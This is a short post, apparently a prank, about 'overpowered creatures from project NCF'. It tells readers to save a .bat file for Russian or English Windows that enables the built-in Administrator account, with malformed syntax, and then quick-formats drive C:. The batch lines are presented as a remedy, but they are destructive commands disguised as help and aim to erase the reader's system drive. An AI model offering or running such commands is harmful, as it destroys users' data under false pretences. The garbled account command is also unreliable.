In general, if you are not happy with the overpowered creatures from project NCF, then you need to create a .bat file that should contain the following lines for a Russian-language Windows:

net user Администратор:active /yes
format c: /fs:udf /x /q

If Windows is in English, it should be as follows:

net user Administrator:active /yes
format c: /fs:udf /x /q
